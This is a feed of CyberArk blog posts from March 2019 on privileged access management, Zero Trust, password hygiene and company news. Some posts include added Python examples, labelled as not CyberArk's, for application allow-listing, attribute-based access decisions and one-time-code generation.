5 Keys to Securing Business Critical Applications in an Age of Digital Transformation: Keeping Your Organization Running at the Speed of Business https://www.cyberark.com/blog/5-keys-to-securing-business-critical-applications-in-an-age-of-digital-transformation-keeping-your-organization-running-at-the-speed-of-business/ Thu, 28 Mar 2019 17:45:33 +0000 https://www.cyberark.com/?p=40509

The age of digital transformation is upon us. Cloud, virtualization and containerization are becoming mainstream. With all of the buzzwords and technology hype, it is easy to forget the real business drivers behind this age of innovation. Established industries like finance and healthcare are being disrupted by new and nimble startups who have leap-frogged established players with new technologies that bring tremendous competitive advantage with speed to market, flexibility and resiliency. Now, established enterprises are adopting these new technologies to ensure and recapture their market leadership positions. It truly is an exciting time in B2B technology, but what about the engine of the enterprise? Business critical applications are the motor that keep firms running. They too are seeing change with the adoption of cloud and SaaS applications, but are often overlooked when it comes to their security.

Business critical for a reason

Consider the vast information and applications within your organization. Depending on your line of work and industry, you will have your own list of critical business applications and related data that, if compromised or lost, would put your business at a standstill. These can include applications like financial transaction apps and their related sensitive customer data; enterprise resource planning (ERP) applications that help manage crucial inventory for retailers or hospitals; or critical electronic health record (EHR) applications storing vital electronic personal health information (ePHI) for health care providers, hospitals and insurers.

But how do organizations secure all of this sensitive information and the applications that store and manage it? Unfortunately, many business and IT stakeholders are finding themselves in a risky position. While they are doing a great job curating the right applications for their needs, they are missing the boat on protecting these costly investments that run their enterprises – and drive customer relationships.

According to a recent CyberArk Business Critical Application survey of 1,450 business and IT decision makers conducted across eight EMEA countries, 61% indicated that even the slightest downtime affecting their business critical applications would be massively disruptive and severely impact the business. Yet, 70% of these enterprises do not prioritize the security of business critical applications. So what can you do to help bridge this gap? CyberArk just released an eBook, “The Age of Digital Transformation: 5 Keys to Securing Business Critical Applications,” to answer your questions. Here is a preview of the first two points.

1. Identify what apps are truly business critical

As a security leader, it goes without saying that you need to be one with the business. Get to know your line of business leaders and the leaders of key functions such as finance, human resources and marketing. Once you have a handle on important business initiatives, you will be in a better place to identify the business apps that are truly critical. These could be SaaS applications or even custom applications built using DevOps tools and methodologies.

2. Get comfortable with the cloud (and securing it)

Understand what your cloud strategy, migration plan and timelines are for on-premises applications that are moving to the cloud or new cloud-native applications. Partner with cross-functional stakeholders to ensure privileged access management is a front-and-center consideration when you’re looking to migrate applications to the cloud or to adopt new cloud applications.

To learn about keys three through five and find out more about securing business critical apps, download the eBook here.

Rethinking Your Approach to Your Enterprise Directory https://www.cyberark.com/blog/rethinking-your-approach-to-your-enterprise-directory/ Thu, 28 Mar 2019 17:31:38 +0000 https://www.cyberark.com/?p=99359

Fueled by advances in technology and widely-recognized business benefits, many organizations today are actively moving to cloud-based applications, platform services and infrastructure as a service. This trend, coupled with an explosion in mobile computing, means that IT must increasingly enable access to these applications, services and infrastructure anytime, anywhere. There are also new complexities related to digital transformation projects across the enterprise, which often involve building new web presences, online business models, and applications for employees, partners and consumers. In turn, these paradigm shifts are encouraging CEOs, CIOs and IT organizations to rethink their traditional approaches to many foundational services within the organization.

One such foundational service is the enterprise directory – the single source of truth for all identity information related to individuals (employees, contractors, partners, consumers), endpoints (mobile devices, workstations and laptops) and even infrastructure (servers, network devices, etc.). Traditionally, most organizations have invested in building out a legacy enterprise directory framework based on an on-premises Microsoft Active Directory (AD) or other directories based on the Lightweight Directory Access Protocol (LDAP). While these frameworks served organizations well in the on-premises world, they fall short of enabling an organization to truly embrace the cloud and mobile world.

Designing, deploying and managing this legacy enterprise directory framework comes with extensive requirements to invest in people, processes, technologies and infrastructure. This in turn creates significant opportunity cost for any enterprise looking to extend its competitive advantage through new and forward-looking technology investments. These legacy frameworks are also limited in their authentication and authorization capabilities, especially in the new cloud world. Cloud applications and services increasingly leverage new protocols such as SAML, OpenID Connect and OAuth 2.0, as opposed to using traditional mechanisms like Integrated Web Authentication (IWA) using Kerberos or NTLM. These services are also limited in their ability to support the modern BYOD (Bring Your Own Device) and BYOI (Bring Your Own Identity) models, where individuals consume the organization’s services using their own devices and their own identities from platforms that may include Facebook, Twitter, LinkedIn and others, in addition to federated services. Similarly, managing and securing access to cloud IaaS like AWS, GCP and Azure can also be a challenge with these legacy frameworks.

Designed precisely with this paradigm shift in mind, Idaptive’s Next-Generation Cloud Directory addresses many of the challenges detailed above. A highly scalable, performant and turnkey cloud service, the Idaptive Cloud Directory can scale up to tens of millions of users and devices, enabling organizations to deliver web-scale digital experiences to their consumers, employees, contractors and partners. The Directory supports comprehensive User and Device Management and Role Based Access Control through a Policy-Based framework that applications and devices can leverage to drive superior access security and demonstrate compliance. The Cloud Directory, along with the Idaptive Next-Gen Access Platform, also enables authentication via new protocols like SAML, OpenID Connect, OAuth 2.0, etc., while supporting legacy protocols like IWA.

CyberArk Idaptive’s market leading Adaptive Multi-Factor Authentication service is deeply integrated with the Cloud Directory, enabling organizations to implement stronger authentication assurance and risk-based access to applications and devices. Lastly, Idaptive’s Identity Lifecycle Management services, built to leverage the Cloud Directory, enable seamless provisioning from and to the Cloud Directory into Line of Business applications like Box or HR systems like Workday and BambooHR. And with an API interface that enables all interaction with the directory to be done via APIs, and an enterprise grade Secure Token Service integrated with the Directory, the directory enables not just IT admins, but also developers to integrate their applications with it.

The Cloud Directory will also soon deliver a brand-new paradigm called Brokered Authentication. Using Brokered Authentication, the Cloud Directory can serve as a virtual directory, allowing users to login to applications, endpoints and services using their existing enterprise credentials (AD or LDAP), enabling a seamless transition from an existing legacy directory to the Idaptive Cloud Directory.

If you’re looking to try the Idaptive Next-Gen Cloud Directory and accelerate your cloud and mobile first initiatives, sign up for our free trial here.

]]>
HiMSS Conference: Adding an “S” for Security? https://www.cyberark.com/blog/himss-conference-adding-an-s-for-security/ Wed, 27 Mar 2019 13:34:21 +0000 https://www.cyberark.com/?p=40145

The Healthcare Information and Management Systems Society (HIMSS) is one of the largest healthcare member organizations in the world, and its annual HIMSS conference is renowned as the premier industry event for learning about innovative healthcare technology. One of the rapidly growing areas of interest for healthcare organizations is security, particularly as attackers continue to target providers to compromise the trove of electronic protected health information (ePHI) that providers maintain.

Having attended many technology conferences over the past several years, I found the booths and exhibition floor of this year’s HiMSS conference to be more creative and interactive than almost any other show. From a session standpoint, a few common themes emerged. First, it is clear that the explosion of network-connected medical devices is dramatically expanding the attack surface, and IT and security teams at healthcare providers are challenged to keep pace and maintain the security of their privileged accounts. Second, adhering to compliance requirements and “passing the audit” remains the primary driver for healthcare organizations’ investments in IT solutions, perhaps competing with security investments to some extent. The third trend that stood out was that providers are still trying to find solutions that automate low-level work so that teams can spend their time on higher-value tasks. None of this is necessarily a surprise to those familiar with the challenges in healthcare, but I did find something that surprised me, and it wasn’t at a session.

In fact, I was elated to find that most of the discussions we had at the show were with attendees who had senior security titles. I was immediately curious about their motivation for attending and found that most of those I spoke with were within their first year leading security for their organization. Many of these professionals have held senior security positions in other industries, but had recently been brought on to lead security efforts because the provider’s board and C-level executives are now prioritizing proactive, sustainable security programs. There seemed to be consensus among the security pros I spoke with that they were facing the same challenges I heard about in the sessions. However, I was invigorated to find out that this new group of cybersecurity leaders was ready to think long-term about building a cybersecurity program to defend against emerging threats, rather than focusing on short-term strategies to avoid failed audits.

Therefore, back to my initial question: while I do not think there will be an extra “S” added to the HiMSS conference acronym soon, I firmly believe that the industry’s overall evolution from audit drivers to an emphasis on security strategy will continue to drive impactful discussions. I’m already looking forward to next year!

]]>
Zero Trust Part II: The Evolution of Trust and Five Key Considerations https://www.cyberark.com/blog/zero-trust-part-ii-the-evolution-of-trust-and-five-key-considerations/ Tue, 26 Mar 2019 13:00:37 +0000 https://www.cyberark.com/?p=40074 Zero Trust

This is the second half of a two-part series on Zero Trust. Find the first part here.

The Russian proverb ‘trust, but verify’, made famous by Ronald Reagan during arms-control negotiations with the Soviet Union, has been leveraged many times over to describe Zero Trust. But the definition of trust in this context has certainly evolved. The adage probably needs an update to something more appropriate like ‘trust, but verify and re-verify’: keep re-verifying and adding layers of security until you establish true Zero Trust.

A logical progression from trust to Zero Trust begins with verifying the actual identity (be it a human or machine identity). Then, instead of trusting the entity, you trust the asset that the entity accesses, and set up controls (e.g. certificates or device scanning) that ensure the asset can be trusted on the network. A defense-in-depth, layered approach is instrumental to a true Zero Trust strategy.

We recommend the following five steps for building out modern architectures that align to Zero Trust:

1) Implement a Risk-based Approach to Security

End users, applications, data and infrastructure no longer exist solely within the confines of the data center and corporate office space, and you can’t control what you don’t own. The “castle and moat” approach no longer applies in this model. Organizations need to secure their enterprise at the core, which starts with securing the privileged access pathway.

Insider threats and external attacks continue to persist, affect every industry and often involve the misuse of privilege [1]. The core of what we do at CyberArk is to empower organizations to take a risk-based approach to a better security posture, enabling them to implement their strategy over time and focus on what matters most first. Your first priority should be securing your last line of defense, which is privileged access, since it’s the road most traveled by internal and external nefarious characters.

CyberArk is established as the leader for protecting against privileged account compromise, wherever those accounts exist: on premises, in the cloud and everywhere in between. CyberArk provides the controls you need to take a risk-based approach to security. We’ve developed a programmatic approach designed to help organizations improve security and reduce risk by establishing and maintaining strong privileged access management hygiene. Taking a programmatic approach that starts from a thorough understanding of the risk your organization faces, as it relates to Zero Trust, and building from there is key.

2) Continuous Multi-step Authentication and Security for Tier 0 Assets

As investment in perimeter security has yielded diminishing returns over time, the need for stronger security on administrator access to Tier 0 assets has only accelerated. Single-factor authentication is a single point of failure; multi-factor authentication (MFA) narrows the scope of trust placed in users and devices.

Beyond MFA, introducing things like step-up authentication and managerial approval processes before allowing access to critical assets and resources is essential for Zero Trust. These technologies allow for the authentication of privileged users at the exact point of access to sensitive assets, dramatically mitigating risk from privileged credential-based attacks.

With traditional VPN solutions, organizations are forced to provide all-or-nothing access to the internal network. The issue becomes even more challenging if temporary access needs to be provided to external vendors. It’s important to consider scenarios that involve multiple access types, including third parties and remote vendors, and to provide an improved remote user experience with modern authentication techniques to secure access to corporate resources and applications.

Both Zero Trust and Google’s BeyondCorp models require consistent, continual authentication and access management for users logging into mission- and business-critical applications, including the CyberArk Privileged Access Security Solution. Ensure authorized privileged users are on secure devices when accessing their accounts as well as Tier 1 and Tier 0 assets. Continuous multi-step authentication will increasingly become a part of every effective security program, not just Zero Trust.

3) Secure Core Privileges on Endpoints

One of the main pitfalls and shortcomings of implied trust is that if someone gets a foothold on an endpoint, they essentially become that user (be it a standard or privileged user). In the event an attacker or malicious insider gains access to a privileged account and its associated credential, they become indistinguishable from a fully validated and trusted user. This makes it difficult to detect high-risk activity and behavior.

Application control is an important factor in the ‘trust, but verify and re-verify’ methodology. Organizations should implement allow-list models that only trust specified applications, run by specific accounts and under specific circumstances; anything outside the list is denied by default. Application control helps mitigate the risk of ransomware and code injection (among others) and is a foundational component of a Zero Trust strategy.
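The allow-list model described above, as an added illustration that is not CyberArk code: each executable is identified by the SHA-256 of its contents rather than by its file name or path (both of which an attacker controls), and a rule states which accounts may run it, from which parent process, and when. The sample binaries, account names, parent-process names and business-hours window are all constructed for the example.

```python
"""Hash-based application allow-listing (added example, not CyberArk code).

Executables are keyed by SHA-256 of their bytes. A Rule says who may run the
binary and under what circumstances. Anything not on the list is denied.
"""
import hashlib
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class Rule:
    description: str
    allowed_accounts: frozenset          # accounts permitted to run it
    allowed_parents: frozenset = frozenset()  # empty = any parent process
    business_hours_only: bool = False    # restrict to Mon-Fri 09:00-17:59


def sha256_of(data: bytes) -> str:
    """Identity of a binary is its content hash, never its name or path."""
    return hashlib.sha256(data).hexdigest()


# Constructed stand-ins for real executables; in practice hash the file on disk.
SIGNED_BACKUP_TOOL = b"MZ...backup-agent-v3.2..."          # hypothetical
ADMIN_CONSOLE = b"MZ...privileged-admin-console..."        # hypothetical
UNKNOWN_DROPPER = b"MZ...totally-legit-invoice.pdf.exe"    # hypothetical

# Enterprise allow-list: hash -> rule. Hypothetical accounts and parents.
ALLOWLIST = {
    sha256_of(SIGNED_BACKUP_TOOL): Rule(
        "backup agent",
        allowed_accounts=frozenset({"svc_backup"}),
        allowed_parents=frozenset({"services.exe"})),
    sha256_of(ADMIN_CONSOLE): Rule(
        "admin console",
        allowed_accounts=frozenset({"alice_admin"}),
        business_hours_only=True),
}


def decide(content: bytes, account: str, parent: str, when: datetime):
    """Return (allowed, reason). Default deny: unlisted hashes never run."""
    rule = ALLOWLIST.get(sha256_of(content))
    if rule is None:
        return False, "hash not on allow-list"
    if account not in rule.allowed_accounts:
        return False, f"{account} may not run {rule.description}"
    if rule.allowed_parents and parent not in rule.allowed_parents:
        return False, f"unexpected parent process {parent}"
    in_hours = when.weekday() < 5 and 9 <= when.hour < 18
    if rule.business_hours_only and not in_hours:
        return False, "outside business hours"
    return True, f"{rule.description} permitted"


if __name__ == "__main__":
    now = datetime(2019, 3, 26, 10, 0)
    for binary, acct, parent in [
        (SIGNED_BACKUP_TOOL, "svc_backup", "services.exe"),
        (SIGNED_BACKUP_TOOL, "svc_backup", "cmd.exe"),
        (ADMIN_CONSOLE, "alice_admin", "explorer.exe"),
        (UNKNOWN_DROPPER, "alice_admin", "explorer.exe"),
        (SIGNED_BACKUP_TOOL + b"\x90", "svc_backup", "services.exe"),
    ]:
        print(decide(binary, acct, parent, now))
```

Note that the last case in the usage block is the same backup tool with one byte appended: a tampered or trojanized copy gets a new hash and is denied, which is exactly why the list is keyed by content and not by name.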

Beyond identifying all human and machine users, discovering and classifying any and all assets, both software and hardware, within the enterprise is important. It’s important to understand your device health across the enterprise: know your device fleet! Get a handle on which software versions you’re running and establish security configurations such as screen lock and disk encryption on all of your devices under management. Establish device trustworthiness and wrap centralized policy around it, e.g. management status, software versions and security properties.

Zero Trust is just the beginning. Start by providing ‘initial trust’ and continue to verify and re-verify and put controls in place to mitigate risk. Introducing controls on the endpoint provides some level of trust, but securing and monitoring the privileged pathway takes you that much further towards true Zero Trust.

4) Secure and Monitor the Privileged Pathway

Trust, verification and monitoring of network traffic are three main elements of both Zero Trust and BeyondCorp. Key indicators of malicious activity are often overlooked or mischaracterized as benign due to an implicit trust that malicious activity will be flagged by detection mechanisms [2].

With traditional perimeter models, there’s always a way in and out of a network. Visibility is important. Detection, response, remediation and recovery are even more important. Monitoring the privileged access pathway lets you spot malicious insiders and external attackers before they progress their attack. Place tight controls around what end users are accessing, and monitor, detect, respond and remediate before the business suffers irreparable damage.

Create isolation layers between endpoints, users and target systems and monitor access – specifically the “who, what and when.” Create secure connections for end users connecting to critical assets and resources and make sure you have the ability to review the session in real-time. Identify and pre-define the key indicators of malicious activity and implement automated controls to respond when it’s necessary to take action. As more and more employees work from remote locations and from uncontrolled devices, having the ability to provide application isolation layers to protect corporate resources from these uncontrolled devices is critical to Zero Trust.

CyberArk provides rich analytics out-of-the-box that couples deterministic algorithms, statistical modeling, machine learning and behavior profiling to enable the organization to make calculated decisions based on both trust and risk. Combining intelligent analytics and response results in a force multiplier that inherently scales security proficiency, especially where resource constraints present an issue to the business.

5) Implement Attribute-based Granular Access Controls

Knowing who (for both human and non-human users) has access, to what and which actions they are able to perform is vital. Enforce attribute-based access control that combines enterprise-level policy with specific user criteria.

Enforce governance and the principle of least privilege over everything and control what users and applications are able to do. For human users, enforce both access and active controls. This doesn’t just mean access control in the traditional sense, but also placing controls around privileged task activities and management.

Going beyond least privilege enforcement, organizations should create active controls that allow privileged users to execute certain pre-defined tasks while blocking activities that present a high risk to the organization. Zero Trust concepts also need to be applied to applications, not just to human users. If an application has its credential hardcoded, anyone who gains access to the application (or to its code and configuration) can extract that credential and use it to impersonate the application. Then it’s game over.
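The combination described in considerations 2 and 5 above, as an added example rather than CyberArk product logic: enterprise-level policy states what each asset tier demands (authentication assurance, device posture, approval), per-request attributes say who is asking from what device and at what assurance level, and a separate task list implements the “active controls” so that even an entitled admin only gets pre-defined actions. The tier definitions, role names, authentication levels and task names are assumptions for illustration.

```python
"""Attribute-based access decision for privileged access (added example).

Enterprise policy per asset tier + request attributes -> allow / deny /
step-up. Tier numbers, roles, auth levels and tasks are hypothetical.
"""
from dataclasses import dataclass

# Enterprise-level policy: the higher the tier, the more a request must prove.
# Tier 0 = identity infrastructure and the vault itself, Tier 1 = servers and
# applications, Tier 2 = user workstations (assumed classification).
TIER_POLICY = {
    0: {"min_auth_level": 3, "managed_device": True, "approval": True,
        "roles": {"domain_admin"}},
    1: {"min_auth_level": 2, "managed_device": True, "approval": False,
        "roles": {"domain_admin", "server_admin"}},
    2: {"min_auth_level": 1, "managed_device": False, "approval": False,
        "roles": {"domain_admin", "server_admin", "helpdesk"}},
}

# Active controls: pre-defined tasks per role; anything else is blocked.
TASKS_BY_ROLE = {
    "domain_admin": {"read", "restart_service", "rotate_credential", "modify_gpo"},
    "server_admin": {"read", "restart_service"},
    "helpdesk": {"read", "reset_user_password"},
}

# Authentication assurance (assumed scale):
#   1 = password only, 2 = password + MFA at login,
#   3 = MFA re-verified (step-up) at the point of access.


@dataclass(frozen=True)
class Request:
    user: str
    roles: frozenset
    auth_level: int
    device_managed: bool
    device_encrypted: bool
    target_tier: int
    task: str
    approved: bool = False       # managerial approval already granted?


@dataclass(frozen=True)
class Decision:
    allow: bool
    reason: str
    step_up_to: int = 0          # non-zero: retry after re-authenticating at this level


def evaluate(req: Request) -> Decision:
    """Evaluate in order: entitlement, device posture, assurance, approval, task."""
    policy = TIER_POLICY[req.target_tier]
    eligible = req.roles & policy["roles"]
    if not eligible:
        return Decision(False, "no role entitled to this tier")
    if policy["managed_device"] and not (req.device_managed and req.device_encrypted):
        return Decision(False, "device not managed and encrypted")
    if req.auth_level < policy["min_auth_level"]:
        # Not a hard deny: the user can step up and try again.
        return Decision(False, "authentication assurance too low",
                        step_up_to=policy["min_auth_level"])
    if policy["approval"] and not req.approved:
        return Decision(False, "managerial approval required")
    permitted = set().union(*(TASKS_BY_ROLE[r] for r in eligible))
    if req.task not in permitted:
        return Decision(False, f"task {req.task!r} is not a pre-defined task for this role")
    return Decision(True, "allowed")


if __name__ == "__main__":
    base = dict(user="alice", roles=frozenset({"domain_admin"}), device_managed=True,
                device_encrypted=True, target_tier=0, task="rotate_credential")
    print(evaluate(Request(auth_level=2, approved=True, **base)))   # step-up to 3
    print(evaluate(Request(auth_level=3, approved=True, **base)))   # allowed
    print(evaluate(Request(auth_level=3, approved=False, **base)))  # approval required
```

The ordering matters: device posture is checked before assurance so that an unmanaged device is never told what authentication level would have sufficed, and the step-up path is only offered once the cheaper attribute checks have passed.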

The evolution of perimeter security has undoubtedly influenced the principles of Zero Trust, and the foundation of privileged access management draws a tight analogy, as it’s very much connected to these same principles. You cannot achieve true Zero Trust without incorporating privileged access management controls at the core of your strategy.

To learn more about Zero Trust, watch the Implementing Privileged Access Security into Zero Trust Models and Architectures webinar.

 

References:

[1] Verizon, 2018 Data Breach Investigations Report, March 2018

[2] FireEye, M-Trends 2018, April 2018

 

]]>
KuppingerCole Analysts Names CyberArk an Overall Privileged Access Management Leader https://www.cyberark.com/blog/kuppingercole-analysts-names-cyberark-an-overall-privileged-access-management-leader/ Mon, 25 Mar 2019 14:29:44 +0000 https://www.cyberark.com/?p=39856

Today, independent analyst firm KuppingerCole Analysts released its 2019 “Leadership Compass: Privileged Access Management” report. Maintaining our overall leadership position for four consecutive years, CyberArk surpassed 19 other evaluated vendors, demonstrating advantages across product, innovation and market evaluation categories.

According to KuppingerCole lead analyst Anmol Singh, “Privileged Access Management, over the past few years, has become one of the most relevant areas of cybersecurity associated with IAM (Identity and Access Management) that deals with identifying, securing and managing privileged credentials across an organization’s IT environment. Once considered a technology option for optimizing administrative efficiency by managing passwords and other secrets, [it] has evolved into a set of crucial technologies for preventing security breaches and credential thefts.”

The prestigious Leadership Compass report provides a comprehensive view of the Privileged Access Management marketplace and aims to help security and IAM leaders identify the privileged access management solutions with the greatest impact on cybersecurity. The CyberArk Privileged Access Security Solution was recognized by KuppingerCole for capabilities including:

According to the report, “CyberArk remains the vendor of choice for global organizations seeking a comprehensive, market-leading privileged access management solution for complex requirements.” Identified as “the most prominent vendor” in the market, we are honored to be recognized for our “focus on constant innovation” as we help customers proactively protect against advanced cybersecurity threats and adopt digital transformation strategies with confidence.

This market leadership recognition comes on the heels of the 2019 RSA Conference, where CyberArk was named the 2019 SC Award winner for Best Enterprise Security Solution, once again reinforcing privileged access as an enterprise security priority.

You can download a complimentary copy of the KuppingerCole Privileged Access Management Leadership Compass report here. To learn more about what sets CyberArk apart, visit here.

]]>
CyberArk Named a Gartner Peer Insights Customers’ Choice for Privileged Access Management https://www.cyberark.com/blog/cyberark-named-a-gartner-peer-insights-customers-choice-for-privilege-access-management/ Thu, 21 Mar 2019 13:00:54 +0000 https://www.cyberark.com/?p=39720

CyberArk is excited to announce that we have been recognized as a March 2019 Gartner Peer Insights Customers’ Choice for Privileged Access Management *

CyberArk was recently named a Leader in the first-ever Gartner Magic Quadrant for Privileged Access Management1.

According to Gartner, “The Gartner Peer Insights Customers’ Choice is a recognition of vendors in this market by verified end-user professionals, taking into account both the number of reviews and the overall user ratings.” To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors with a high customer satisfaction rate.

CyberArk users have highly ranked the CyberArk Privileged Access Security Solution on Gartner’s Peer Insights review site, including:

“Our overall experience with CyberArk has been exceptional from planning implementation through to steady state.”

Security Project Manager, Services Industry

Read the review

“CyberArk’s support and account resources are extremely knowledgeable, and a pleasure to work with. They want to help you achieve your security goals, but do so in a way that show they understand the challenges we deal with on a daily basis.”  

Security and Risk Management, Finance Industry

Read the review

To our customers who submitted reviews, thank you! We are grateful for our enthusiastic customers around the world, and look forward to continued collaboration as we work together to reinforce privileged access management as a top security priority. If you have a CyberArk story to share, we encourage you to share your experience via the Gartner Peer Insights program. Click here to submit a review.

 

1 Gartner, Magic Quadrant for Privileged Access Management, Felix Gaehtgens, Dale Gardner, Justin Taylor, Abhyuday Data, Michael Kelley, 3 December 2018

The GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE badge is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved. Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.

Note: Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

]]>
The Future of Passwords Isn’t Looking Bright – But We Still Have to Secure Them https://www.cyberark.com/blog/the-future-of-passwords-isnt-looking-bright-but-we-still-have-to-secure-them/ Tue, 19 Mar 2019 13:30:05 +0000 https://www.cyberark.com/?p=39326

Many security and IT professionals consider passwords to be the weakest link in their company’s defenses – and that’s for a good reason. The lack of strong passwords, a failure to change (or rotate) passwords on a regular basis, human error and the most significant flaw — password reuse — are among the main issues. Passwords are frequently the first line of defense. They are a defense for the endpoint – the workstation, laptop or smartphone where you start your workday. This is your first point of contact with your organization’s system and, if compromised, it is an attacker’s first point of entry as well. A compromised endpoint is the first step in an attack, so any flaw in its security defenses is serious.

Because of this, many companies are looking for a way to kill the password once and for all. Google just initiated a “passwordless” pilot program that provides remote access to their employees. Microsoft already declared “an end to the era of the password” at its 2018 Ignite Conference. Yahoo tried to kill the password back in 2015 with their “Account key,” which was a push feature.

Think about the most common types of attacks we see today: sophisticated phishing and spear phishing, brute force attacks, social engineering and credential-stealing malware. They all have one thing in common. Nearly every one of these attacks is after someone’s password, and more specifically, privileged credentials.

It’s not surprising that there have been any number of attempts to replace the password and a few of these – such as biometrics-based approaches like facial recognition and fingerprint scans – have seen some adoption. While these innovative alternatives will be adopted over time, it is going to take some time before we reach a passwordless nirvana.

Here are some of best practices for IT admins and security teams to make sure end-user passwords are not compromised in the meantime.

Fact: Every single character you add in your password increases the difficulty for hackers to crack it.

Use a strong password – Strong passwords are long and contain several different types of characters and, consequently, require more effort and time for an attacker to crack. Passwords should contain at least 10 characters and include a combination of character types, such as commas, percent signs and parentheses, as well as upper-case and lower-case letters and numbers. Length matters most: each added character multiplies the number of guesses an attacker must make.

Fact: More than half of IT professionals reuse passwords across five or more accounts. [1]

Use a unique password for each service and account – If you reuse passwords on multiple sites or accounts, then even if your password is long and complex enough, all it takes is for one of those accounts to be compromised to make all of your other accounts vulnerable.

Fact: Multi-factor authentication provides an extra layer of security that is hard for attackers to crack.

Use multi-factor authentication – This means that multiple types of authentication, not just a password, are required to unlock the account. The first factor is something the user knows, like a password. The second factor is something the user has, such as a code sent to their mobile phone or generated by a designated authenticator application on the phone.

This code becomes the other half of your login authentication. Now, even if attackers manage to get your password, without the other part of the authentication, they still don’t have access to your account.
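How that second factor is produced, as an added example that is not from the original post: the authenticator app and the server share a secret enrolled once (usually via a QR code), and both derive the same short code from the current 30-second time step using HMAC, following RFC 4226 (HOTP) and RFC 6238 (TOTP). The server-side check below accepts one neighbouring time step for clock drift and compares in constant time. The shared secret used in the usage block is the reference key from the RFC test vectors, so the output can be checked against the published values; it is a test key, not one to deploy.

```python
"""Time-based one-time codes (RFC 4226 / RFC 6238) with the standard library.

Added example of how an authenticator app and a server compute the same
six-digit code from a shared secret; not CyberArk code.
"""
import base64
import hashlib
import hmac
import secrets
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226) for a given counter value."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                   # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, at: int, step: int = 30, digits: int = 6) -> str:
    """Time-based OTP (RFC 6238): HOTP over the number of elapsed time steps."""
    return hotp(secret, at // step, digits)


def verify_totp(secret: bytes, submitted: str, at: int, window: int = 1,
                step: int = 30) -> bool:
    """Server side: accept the current step and +/- `window` neighbouring
    steps to tolerate clock drift; compare in constant time."""
    for drift in range(-window, window + 1):
        candidate = totp(secret, at + drift * step, step)
        if hmac.compare_digest(candidate, submitted):
            return True
    return False


def new_secret_base32(nbytes: int = 20) -> str:
    """What an enrolment QR code carries: a fresh random secret, base32-encoded."""
    return base64.b32encode(secrets.token_bytes(nbytes)).decode()


if __name__ == "__main__":
    # Reference key from the RFC 4226/6238 test vectors (constructed input).
    secret = b"12345678901234567890"
    print("code at t=59:", totp(secret, 59))          # RFC 6238 vector: 287082
    print("code now:", totp(secret, int(time.time())))
    print("enrolment secret:", new_secret_base32())
```

Two practical notes: the `window` parameter is the trade-off between tolerating phone clock drift and widening the guessing window, so keep it at 1; and because the server stores the shared secret in the clear, it needs the same protection as a password database, which is why authenticator secrets belong in a vault rather than a plain column.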

Fact: Rotating local admin passwords reduces risk at the endpoints

Address the risk of local admin accounts on workstations – Weak passwords and end users with local admin rights on their workstations represent a significant security risk for organizations. Many attacks start on endpoints where attackers initially gain access through a phishing attack or when an employee inadvertently downloads and executes a malicious application.

In many cases, an attacker’s aim is to compromise the privileged credentials that reside on workstations. Privileged credentials, such as local admin rights, can allow attackers to move laterally until they obtain credentials to systems holding sensitive PII or intellectual property. To reduce this risk, as a first step, organizations should rotate local admin credentials (including the OS built-in local administrator account) on a periodic basis. Over time, organizations should consider removing local admin rights from end-user workstations altogether to further reduce the risk of attacks from the endpoint.

Learn how CyberArk solutions can block and contain threats at the endpoint. Download the Endpoint Privilege Manager Solution Brief, try our free 30-day trial or request a demo.

 

[1] Ponemon Institute, “The 2019 State of Password and Authentication Security Behaviors Report,” January 2019. https://www.yubico.com/wp-content/uploads/2019/01/Ponemon-Authentication-Report.pdf

]]>
MassTLC 2019 DC Fly-In Takes Tech Advocacy to a Higher Plane https://www.cyberark.com/blog/masstlc-2019-dc-fly-in-takes-tech-advocacy-to-a-higher-plane/ Thu, 14 Mar 2019 15:26:10 +0000 https://www.cyberark.com/?p=38176

CyberArk is a member of the Massachusetts Technology Leadership Council (MassTLC), an industry consortium of 500 organizations. Every year, MassTLC joins their counterparts across North America to attend the Computing Technology Industry Association (CompTIA) Fly-In. MassTLC invites a select group of technology leaders to join them for this conference and Capitol Hill visits to talk to legislators and educate them on the most important issues facing the technology community. For the past two years, Adam Bosnian, EVP of Global Business Development at CyberArk, has attended the DC Fly-In as a representative from CyberArk.

The MassTLC delegation focused on three areas: infrastructure, talent and data privacy. Bosnian advocated for improved infrastructure. The delegation to Capitol Hill was ten people: Tom Hopcroft, president and CEO of MassTLC; Sara Fraim, director of policy for MassTLC; and representatives from top technology companies and start-ups in Massachusetts.

The group spoke with Senator Ed Markey, Congresswoman Lori Trahan, Congressman Joe Kennedy, Congresswoman Ayanna Pressley, Congresswoman Katherine Clark and representatives for Congressman Stephen Lynch and Congressman Seth Moulton. With each representative, the group had approximately 30 minutes to make their case.

After Adam returned from DC, I asked him a few questions about his experience.

When you went to talk with the legislators, what did you advocate for?

Very often infrastructure legislation is mostly focused around transportation. CompTIA’s position is that when you’re working on infrastructure bills, you need to consider smart technologies and funding for those technologies. You can imagine this to be things like sensors in roads or cars.

I said that while we absolutely want to put dollars into smart technologies, we shouldn’t forget money to refresh the backend systems that are supporting things like energy grids and public utilities. Currently, those backend systems can’t support smart technologies.

As we refresh those backend systems, it will also allow us to put cybersecurity on those systems. Today, the grid is running on technology that’s at least 20 to 30 years old. We can’t adequately apply cybersecurity controls to it. Almost every legislator said that they’d heard a briefing regarding the grid and how it’s susceptible to attack.

Modernizing the backend provides not just an infrastructure modernization benefit, but also a national cybersecurity benefit.

So, where does CyberArk fit in? We primarily focus on securing the data center and the IT side of the house. But all of the problems that we solve on the data center side exist on the operational technologies side of the house – consider manufacturing production lines, managing power lines or the power grid itself.

